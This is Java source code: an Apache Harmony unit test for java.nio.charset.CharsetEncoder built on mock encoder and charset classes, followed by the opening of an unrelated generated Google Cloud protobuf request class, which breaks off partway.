/* Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package tests.api.java.nio.charset; import java.nio.ByteBuffer; import java.nio.CharBuffer; import java.nio.charset.CharacterCodingException; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CharsetEncoder; import java.nio.charset.CoderResult; import java.nio.charset.CodingErrorAction; import java.nio.charset.MalformedInputException; import java.nio.charset.UnmappableCharacterException; import java.nio.charset.UnsupportedCharsetException; import java.util.Arrays; import junit.framework.TestCase; /** * API unit test for java.nio.charset.CharsetEncoder */ public class CharsetEncoderTest extends TestCase { static final int MAX_BYTES = 3; static final float AVER_BYTES = 0.5f; // charset for mock class private static final Charset MOCKCS = new MockCharset("CharsetEncoderTest_mock", new String[0]); Charset cs = MOCKCS; // default encoder CharsetEncoder encoder; // default for Charset abstract class byte[] defaultReplacement = new byte[] { 63 }; // specific for Charset implementation subclass byte[] specifiedReplacement = new byte[] { 63 }; static final String unistr = " buffer";// \u8000\u8001\u00a5\u3000\r\n"; byte[] unibytes = new byte[] { 32, 98, 117, 102, 102, 101, 114 }; byte[] unibytesWithRep = null; byte[] surrogate = new byte[0]; protected void setUp() throws Exception { super.setUp(); encoder = cs.newEncoder(); if (null == unibytesWithRep) { byte[] replacement = encoder.replacement(); unibytesWithRep = new byte[replacement.length + unibytes.length]; System.arraycopy(replacement, 0, unibytesWithRep, 0, replacement.length); System.arraycopy(unibytes, 0, unibytesWithRep, replacement.length, unibytes.length); } } /* * @see TestCase#tearDown() */ protected void tearDown() throws Exception { super.tearDown(); } public void testSpecificDefaultValue() { assertTrue(encoder.averageBytesPerChar() == AVER_BYTES); assertTrue(encoder.maxBytesPerChar() == MAX_BYTES); } public void testDefaultValue() { assertEquals(CodingErrorAction.REPORT, encoder.malformedInputAction()); assertEquals(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); assertSame(encoder, encoder.onMalformedInput(CodingErrorAction.IGNORE)); assertSame(encoder, encoder .onUnmappableCharacter(CodingErrorAction.IGNORE)); if (encoder instanceof MockCharsetEncoder) { assertTrue(Arrays.equals(encoder.replacement(), defaultReplacement)); } else { assertTrue(Arrays.equals(encoder.replacement(), specifiedReplacement)); } } /* * Class under test for constructor CharsetEncoder(Charset, float, float) */ public void testCharsetEncoderCharsetfloatfloat() { // default value encoder = new MockCharsetEncoder(cs, (float) AVER_BYTES, MAX_BYTES); assertSame(encoder.charset(), cs); assertTrue(encoder.averageBytesPerChar() == AVER_BYTES); assertTrue(encoder.maxBytesPerChar() == MAX_BYTES); assertEquals(CodingErrorAction.REPORT, encoder.malformedInputAction()); assertEquals(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); assertEquals(new String(encoder.replacement()), new String( defaultReplacement)); assertSame(encoder, encoder.onMalformedInput(CodingErrorAction.IGNORE)); assertSame(encoder, encoder .onUnmappableCharacter(CodingErrorAction.IGNORE)); // normal case CharsetEncoder ec = new MockCharsetEncoder(cs, 1, MAX_BYTES); assertSame(ec.charset(), cs); assertEquals(1.0, ec.averageBytesPerChar(), 0); assertTrue(ec.maxBytesPerChar() == MAX_BYTES); /* * ------------------------ Exceptional cases ------------------------- */ // NullPointerException: null charset try { ec = new MockCharsetEncoder(null, 1, MAX_BYTES); fail("should throw null pointer exception"); } catch (NullPointerException e) { } ec = new MockCharsetEncoder(new MockCharset("mock", new String[0]), 1, MAX_BYTES); // Commented out since the comment is wrong since MAX_BYTES > 1 // // OK: average length less than max length // ec = new MockCharsetEncoder(cs, MAX_BYTES, 1); // assertTrue(ec.averageBytesPerChar() == MAX_BYTES); // assertTrue(ec.maxBytesPerChar() == 1); // Illegal Argument: zero length try { ec = new MockCharsetEncoder(cs, 0, MAX_BYTES); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, 0); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: negative length try { ec = new MockCharsetEncoder(cs, -1, MAX_BYTES); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, -1); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } } /* * Class under test for constructor CharsetEncoder(Charset, float, float, * byte[]) */ public void testCharsetEncoderCharsetfloatfloatbyteArray() { byte[] ba = getLegalByteArray(); // normal case CharsetEncoder ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, ba); assertSame(ec.charset(), cs); assertEquals(1.0, ec.averageBytesPerChar(), 0.0); assertTrue(ec.maxBytesPerChar() == MAX_BYTES); assertSame(ba, ec.replacement()); /* * ------------------------ Exceptional cases ------------------------- */ // NullPointerException: null charset try { ec = new MockCharsetEncoder(null, 1, MAX_BYTES, ba); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // Illegal Argument: null byte array try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, null); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: empty byte array try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, new byte[0]); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: byte array is longer than max length try { ec = new MockCharsetEncoder(cs, 1, MAX_BYTES, new byte[] { 1, 2, MAX_BYTES, 4 }); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Commented out since the comment is wrong since MAX_BYTES > 1 // This test throws IllegalArgumentException on Harmony and RI // // OK: average length less than max length // ec = new MockCharsetEncoder(cs, MAX_BYTES, ba.length, ba); // assertTrue(ec.averageBytesPerChar() == MAX_BYTES); // assertTrue(ec.maxBytesPerChar() == ba.length); // Illegal Argument: zero length try { ec = new MockCharsetEncoder(cs, 0, MAX_BYTES, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, 0, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } // Illegal Argument: negative length try { ec = new MockCharsetEncoder(cs, -1, MAX_BYTES, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } try { ec = new MockCharsetEncoder(cs, 1, -1, ba); fail("should throw IllegalArgumentException"); } catch (IllegalArgumentException e) { } } /* * Class under test for boolean canEncode(char) */ public void testCanEncodechar() throws CharacterCodingException { // for non-mapped char assertTrue(encoder.canEncode('\uc2c0')); // surrogate char for unicode // 1st byte: d800-dbff // 2nd byte: dc00-dfff assertTrue(encoder.canEncode('\ud800')); // valid surrogate pair assertTrue(encoder.canEncode('\udc00')); } /*----------------------------------------- * Class under test for illegal state case * methods which can change internal states are two encode, flush, two canEncode, reset * ----------------------------------------- */ // Normal case: just after reset, and it also means reset can be done // anywhere public void testResetIllegalState() throws CharacterCodingException { assertSame(encoder, encoder.reset()); encoder.canEncode('\ud901'); assertSame(encoder, encoder.reset()); encoder.canEncode("\ud901\udc00"); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa")); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa"), ByteBuffer.allocate(3), false); assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("aaa"), ByteBuffer.allocate(3), true); assertSame(encoder, encoder.reset()); } public void testFlushIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: after encode with endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(in, out, true); out.rewind(); CoderResult result = encoder.flush(out); // Illegal state: flush twice try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } // Illegal state: flush after encode with endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(in, out, false); try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } } public void testFlushAfterConstructing() { ByteBuffer out = ByteBuffer.allocate(5); //Illegal state: flush after instance created try { encoder.flush(out); fail("should throw IllegalStateException"); } catch (IllegalStateException e) { // Expected } } // test illegal states for encode facade public void testEncodeFacadeIllegalState() throws CharacterCodingException { // encode facade can be execute in anywhere CharBuffer in = CharBuffer.wrap("aaa"); // Normal case: just created encoder.encode(in); in.rewind(); // Normal case: just after encode facade encoder.encode(in); in.rewind(); // Normal case: just after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud902\udc00"); encoder.encode(in); in.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud902'); encoder.encode(in); in.rewind(); // Normal case: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); encoder.encode(in); in.rewind(); // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in); in.rewind(); // Normal case: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); encoder.encode(in); in.rewind(); } // test illegal states for two encode method with endOfInput is true public void testEncodeTrueIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: just created encoder.encode(in, out, true); in.rewind(); out.rewind(); in.rewind(); out.rewind(); // Normal case: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); encoder.encode(in, out, true); in.rewind(); out.rewind(); // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in, out, true); in.rewind(); out.rewind(); // Illegal state: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); try { encoder.encode(in, out, true); fail("should illegal state"); } catch (IllegalStateException e) { } // Normal case: after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.encode(in, out, true); in.rewind(); out.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud905'); encoder.encode(in, out, true); } // test illegal states for two encode method with endOfInput is false public void testEncodeFalseIllegalState() throws CharacterCodingException { CharBuffer in = CharBuffer.wrap("aaa"); ByteBuffer out = ByteBuffer.allocate(5); // Normal case: just created encoder.encode(in, out, false); in.rewind(); out.rewind(); // Illegal state: just after encode facade assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState1")); try { encoder.encode(in, out, false); fail("should illegal state"); } catch (IllegalStateException e) { } // Illegal state: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); try { encoder.encode(in, out, false); fail("should illegal state"); } catch (IllegalStateException e) { } // Normal case:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); encoder.encode(in, out, false); in.rewind(); out.rewind(); // Illegal state: just after flush assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); try { encoder.encode(in, out, false); fail("should illegal state"); } catch (IllegalStateException e) { } // Normal case: after canEncode assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.encode(in, out, false); in.rewind(); out.rewind(); assertSame(encoder, encoder.reset()); encoder.canEncode('\ud905'); encoder.encode(in, out, false); } // test illegal states for two canEncode methods public void testCanEncodeIllegalState() throws CharacterCodingException { // Normal case: just created encoder.canEncode("\ud900\udc00"); encoder.canEncode('\ud900'); // Illegal state: just after encode with that endOfInput is true assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState2"), ByteBuffer.allocate(30), true); try { encoder.canEncode("\ud903\udc00"); fail("should throw illegal state exception"); } catch (IllegalStateException e) { } // Illegal state:just after encode with that endOfInput is false assertSame(encoder, encoder.reset()); encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState3"), ByteBuffer.allocate(30), false); try { encoder.canEncode("\ud904\udc00"); fail("should throw illegal state exception"); } catch (IllegalStateException e) { } // Normal case: just after flush encoder.encode(CharBuffer.wrap("testCanEncodeIllegalState4"), ByteBuffer.allocate(30), true); encoder.flush(ByteBuffer.allocate(10)); encoder.canEncode("\ud905\udc00"); encoder.canEncode('\ud906'); // Normal case: after reset again assertSame(encoder, encoder.reset()); encoder.canEncode("\ud906\udc00"); encoder.canEncode('\ud905'); } /* * --------------------------------- illegal state test end * --------------------------------- */ /* * Class under test for boolean canEncode(CharSequence) */ public void testCanEncodeCharSequence() { // for non-mapped char assertTrue(encoder.canEncode("\uc2c0")); // surrogate char for unicode // 1st byte: d800-dbff // 2nd byte: dc00-dfff assertTrue(encoder.canEncode("\ud800")); // valid surrogate pair assertTrue(encoder.canEncode("\ud800\udc00")); // invalid surrogate pair assertTrue(encoder.canEncode("\ud800\udb00")); } /* * Class under test for Charset charset() */ public void testCharset() { try { encoder = new MockCharsetEncoder(Charset.forName("gbk"), 1, MAX_BYTES); // assertSame(encoder.charset(), Charset.forName("gbk")); } catch (UnsupportedCharsetException e) { System.err .println("Don't support GBK encoding, ignore current test"); } } /* * Class under test for ByteBuffer encode(CharBuffer) */ public void testEncodeCharBuffer() throws CharacterCodingException { // Null pointer try { encoder.encode(null); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // empty input buffer ByteBuffer out = encoder.encode(CharBuffer.wrap("")); assertEquals(out.position(), 0); assertByteArray(out, new byte[0]); // assertByteArray(out, surrogate); // normal case out = encoder.encode(CharBuffer.wrap(unistr)); assertEquals(out.position(), 0); assertByteArray(out, addSurrogate(unibytes)); // Regression test for harmony-3378 Charset cs = Charset.forName("UTF-8"); CharsetEncoder encoder = cs.newEncoder(); encoder.onMalformedInput(CodingErrorAction.REPLACE); encoder = encoder.replaceWith(new byte[] { (byte) 0xef, (byte) 0xbf, (byte) 0xbd, }); CharBuffer in = CharBuffer.wrap("\ud800"); out = encoder.encode(in); assertNotNull(out); } private byte[] addSurrogate(byte[] expected) { if (surrogate.length > 0) { byte[] temp = new byte[surrogate.length + expected.length]; System.arraycopy(surrogate, 0, temp, 0, surrogate.length); System.arraycopy(expected, 0, temp, surrogate.length, expected.length); expected = temp; } return expected; } /** * @return */ protected byte[] getEmptyByteArray() { return new byte[0]; } CharBuffer getMalformedCharBuffer() { return CharBuffer.wrap("malform buffer"); } CharBuffer getUnmapCharBuffer() { return CharBuffer.wrap("unmap buffer"); } CharBuffer getExceptionCharBuffer() { return CharBuffer.wrap("runtime buffer"); } public void testEncodeCharBufferException() throws CharacterCodingException { ByteBuffer out; CharBuffer in; // MalformedException: in = getMalformedCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { try { // regression test for Harmony-1379 encoder.encode(in); fail("should throw MalformedInputException"); } catch (MalformedInputException e) { } encoder.reset(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.IGNORE); out = encoder.encode(in); assertByteArray(out, addSurrogate(unibytes)); encoder.reset(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.REPLACE); out = encoder.encode(in); assertByteArray(out, addSurrogate(unibytesWithRep)); } // Unmapped Exception: in = getUnmapCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); try { encoder.encode(in); fail("should throw UnmappableCharacterException"); } catch (UnmappableCharacterException e) { } encoder.reset(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); out = encoder.encode(in); assertByteArray(out, unibytes); encoder.reset(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); out = encoder.encode(in); assertByteArray(out, unibytesWithRep); } // RuntimeException try { encoder.encode(getExceptionCharBuffer()); fail("should throw runtime exception"); } catch (RuntimeException e) { } } /* * utility method, extract given bytebuffer to a string and compare with * give string */ void assertByteArray(ByteBuffer out, byte[] expected) { out = out.duplicate(); if (out.position() != 0) { out.flip(); } byte[] ba = new byte[out.limit() - out.position()]; out.get(ba); // byte[] ba = out.array(); assertTrue(Arrays.equals(ba, expected)); } /* * Class under test for CoderResult encode(CharBuffer, ByteBuffer, boolean) */ public void testEncodeCharBufferByteBufferboolean() throws CharacterCodingException { ByteBuffer out = ByteBuffer.allocate(200); CharBuffer in = CharBuffer.wrap(unistr); // Null pointer try { encoder.encode(null, out, true); fail("should throw null pointer exception"); } catch (NullPointerException e) { } try { encoder.encode(in, null, true); fail("should throw null pointer exception"); } catch (NullPointerException e) { } // normal case, one complete operation assertSame(encoder, encoder.reset()); in.rewind(); out.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); in.rewind(); encoder.flush(out); // normal case, one complete operation, but call twice, first time set // endOfInput to false assertSame(encoder, encoder.reset()); in.rewind(); out = ByteBuffer.allocate(200); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(duplicateByteArray(unibytes, 3))); // overflow out = ByteBuffer.allocate(4); assertSame(encoder, encoder.reset()); in.rewind(); out.rewind(); assertSame(CoderResult.OVERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 4); assertEquals(out.position(), 4); assertEquals(out.remaining(), 0); assertEquals(out.capacity(), 4); ByteBuffer temp = ByteBuffer.allocate(200); out.flip(); temp.put(out); out = temp; assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); assertSame(encoder, encoder.reset()); in.rewind(); out = ByteBuffer.allocate(4); assertSame(CoderResult.OVERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 4); assertEquals(out.position(), 4); assertEquals(out.remaining(), 0); assertEquals(out.capacity(), 4); temp = ByteBuffer.allocate(200); out.flip(); temp.put(out); out = temp; assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, false)); assertEquals(out.limit(), 200); assertTrue(out.position() > 0); assertTrue(out.remaining() > 0); assertEquals(out.capacity(), 200); assertByteArray(out, addSurrogate(unibytes)); } void printByteBuffer(ByteBuffer buffer) { System.out.println("print buffer"); if (buffer.position() != 0) { buffer.flip(); } byte[] ba = buffer.array(); for (int i = 0; i < ba.length; i++) { System.out.println(Integer.toHexString(ba[i])); } } public void testEncodeCharBufferByteBufferbooleanExceptionFalse() throws CharacterCodingException { implTestEncodeCharBufferByteBufferbooleanException(false); } public void testEncodeCharBufferByteBufferbooleanExceptionTrue() throws CharacterCodingException { implTestEncodeCharBufferByteBufferbooleanException(true); } private byte[] duplicateByteArray(byte[] ba, int times) { byte[] result = new byte[ba.length * times]; for (int i = 0; i < times; i++) { System.arraycopy(ba, 0, result, i * ba.length, ba.length); } return result; } protected void implTestEncodeCharBufferByteBufferbooleanException( boolean endOfInput) throws CharacterCodingException { ByteBuffer out = ByteBuffer.allocate(100); // MalformedException: CharBuffer in = getMalformedCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); CoderResult r = encoder.encode(in, out, endOfInput); assertTrue(r.isMalformed()); encoder.reset(); out.clear(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.IGNORE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytes); encoder.reset(); out.clear(); in.rewind(); encoder.onMalformedInput(CodingErrorAction.REPLACE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytesWithRep); } else { System.out.println("Cannot find malformed char buffer for " + cs.name()); } // Unmapped Exception: in = getUnmapCharBuffer(); encoder.onMalformedInput(CodingErrorAction.REPORT); encoder.onUnmappableCharacter(CodingErrorAction.REPORT); if (in != null) { encoder.reset(); out.clear(); assertTrue(encoder.encode(in, out, endOfInput).isUnmappable()); encoder.reset(); out.clear(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytes); encoder.reset(); out.clear(); in.rewind(); encoder.onUnmappableCharacter(CodingErrorAction.REPLACE); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); assertCodingErrorAction(endOfInput, out, in, unibytesWithRep); } else { System.out.println("Cannot find unmapped char buffer for " + cs.name()); } // RuntimeException try { encoder.encode(getExceptionCharBuffer()); fail("should throw runtime exception"); } catch (RuntimeException e) { } } private void assertCodingErrorAction(boolean endOfInput, ByteBuffer out, CharBuffer in, byte[] expect) { if (endOfInput) { assertByteArray(out, addSurrogate(expect)); } else { in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, endOfInput)); in.rewind(); assertSame(CoderResult.UNDERFLOW, encoder.encode(in, out, true)); assertByteArray(out, addSurrogate(duplicateByteArray(expect, 3))); } } /* * Class under test for CoderResult flush(ByteBuffer) */ public void testFlush() throws CharacterCodingException { ByteBuffer out = ByteBuffer.allocate(6); CharBuffer in = CharBuffer.wrap("aaa"); assertEquals(in.remaining(), 3); // by encode facade, so that internal state will be wrong encoder.encode(CharBuffer.wrap("testFlush"), ByteBuffer.allocate(20), true); assertSame(CoderResult.UNDERFLOW, encoder .flush(ByteBuffer.allocate(50))); } /* * test isLegalReplacement(byte[]) */ public void testIsLegalReplacement() { try { encoder.isLegalReplacement(null); fail("should throw null pointer exception"); } catch (NullPointerException e) { } assertTrue(encoder.isLegalReplacement(specifiedReplacement)); assertTrue(encoder.isLegalReplacement(new byte[200])); byte[] ba = getIllegalByteArray(); if (ba != null) { assertFalse(encoder.isLegalReplacement(ba)); } } public void testIsLegalReplacementEmptyArray() { // ISO, ASC, GB, UTF8 encoder will throw exception in RI // others will pass // try { assertTrue(encoder.isLegalReplacement(new byte[0])); // fail("should throw ArrayIndexOutOfBoundsException"); // } catch (ArrayIndexOutOfBoundsException e) { // } } public void testOnMalformedInput() { assertSame(CodingErrorAction.REPORT, encoder.malformedInputAction()); try { encoder.onMalformedInput(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } encoder.onMalformedInput(CodingErrorAction.IGNORE); assertSame(CodingErrorAction.IGNORE, encoder.malformedInputAction()); } public void testOnUnmappableCharacter() { assertSame(CodingErrorAction.REPORT, encoder .unmappableCharacterAction()); try { encoder.onUnmappableCharacter(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } encoder.onUnmappableCharacter(CodingErrorAction.IGNORE); assertSame(CodingErrorAction.IGNORE, encoder .unmappableCharacterAction()); } public void testReplacement() { try { encoder.replaceWith(null); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } try { encoder.replaceWith(new byte[0]); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } try { encoder.replaceWith(new byte[100]); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } byte[] nr = getLegalByteArray(); assertSame(encoder, encoder.replaceWith(nr)); assertSame(nr, encoder.replacement()); nr = getIllegalByteArray(); try { encoder.replaceWith(new byte[100]); fail("should throw null pointer exception"); } catch (IllegalArgumentException e) { } } protected byte[] getLegalByteArray() { return new byte[] { 'a' }; } protected byte[] getIllegalByteArray() { return new byte[155]; } /* * Mock subclass of CharsetEncoder For protected method test */ public static class MockCharsetEncoder extends CharsetEncoder { boolean flushed = false; public boolean isFlushed() { boolean result = flushed; flushed = false; return result; } public boolean isLegalReplacement(byte[] ba) { if (ba.length == 155) {// specified magic number, return false return false; } return super.isLegalReplacement(ba); } public MockCharsetEncoder(Charset cs, float aver, float max) { super(cs, aver, max); } public MockCharsetEncoder(Charset cs, float aver, float max, byte[] replacement) { super(cs, aver, max, replacement); } protected CoderResult encodeLoop(CharBuffer in, ByteBuffer out) { int inPosition = in.position(); char[] input = new char[in.remaining()]; in.get(input); String result = new String(input); if (result.startsWith("malform")) { // reset the cursor to the error position in.position(inPosition); // in.position(0); // set the error length return CoderResult.malformedForLength("malform".length()); } else if (result.startsWith("unmap")) { // reset the cursor to the error position in.position(inPosition); // in.position(0); // set the error length return CoderResult.unmappableForLength("unmap".length()); } else if (result.startsWith("runtime")) { // reset the cursor to the error position in.position(0); // set the error length throw new RuntimeException("runtime"); } int inLeft = input.length; int outLeft = out.remaining(); CoderResult r = CoderResult.UNDERFLOW; int length = inLeft; if (outLeft < inLeft) { r = CoderResult.OVERFLOW; length = outLeft; in.position(inPosition + outLeft); } for (int i = 0; i < length; i++) { out.put((byte) input[i]); } return r; } protected CoderResult implFlush(ByteBuffer out) { CoderResult result = super.implFlush(out); int length = 0; if (out.remaining() >= 5) { length = 5; result = CoderResult.UNDERFLOW; flushed = true; // for (int i = 0; i < length; i++) { // out.put((byte)'f'); // } } else { length = out.remaining(); result = CoderResult.OVERFLOW; } return result; } protected void implReplaceWith(byte[] ba) { assertSame(ba, replacement()); } } /* * mock charset for test encoder initialization */ public static class MockCharset extends Charset { protected MockCharset(String arg0, String[] arg1) { super(arg0, arg1); } public boolean contains(Charset arg0) { return false; } public CharsetDecoder newDecoder() { return new CharsetDecoderTest.MockCharsetDecoder(this, (float) AVER_BYTES, MAX_BYTES); } public CharsetEncoder newEncoder() { return new MockCharsetEncoder(this, (float) AVER_BYTES, MAX_BYTES); } } }
googleapis/google-cloud-java
35,719
java-securityposture/proto-google-cloud-securityposture-v1/src/main/java/com/google/cloud/securityposture/v1/ListPostureTemplatesRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/securityposture/v1/securityposture.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.securityposture.v1; /** * * * <pre> * Message for requesting list of Posture Templates. * </pre> * * Protobuf type {@code google.cloud.securityposture.v1.ListPostureTemplatesRequest} */ public final class ListPostureTemplatesRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.securityposture.v1.ListPostureTemplatesRequest) ListPostureTemplatesRequestOrBuilder { private static final long serialVersionUID = 0L; // Use ListPostureTemplatesRequest.newBuilder() to construct. private ListPostureTemplatesRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private ListPostureTemplatesRequest() { parent_ = ""; pageToken_ = ""; filter_ = ""; } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new ListPostureTemplatesRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.securityposture.v1.V1mainProto .internal_static_google_cloud_securityposture_v1_ListPostureTemplatesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.class, com.google.cloud.securityposture.v1.ListPostureTemplatesRequest.Builder.class); } public static final int PARENT_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object parent_ = ""; /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The parent. */ @java.lang.Override public java.lang.String getParent() { java.lang.Object ref = parent_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); parent_ = s; return s; } } /** * * * <pre> * Required. Parent value for ListPostureTemplatesRequest. * </pre> * * <code> * string parent = 1 [(.google.api.field_behavior) = REQUIRED, 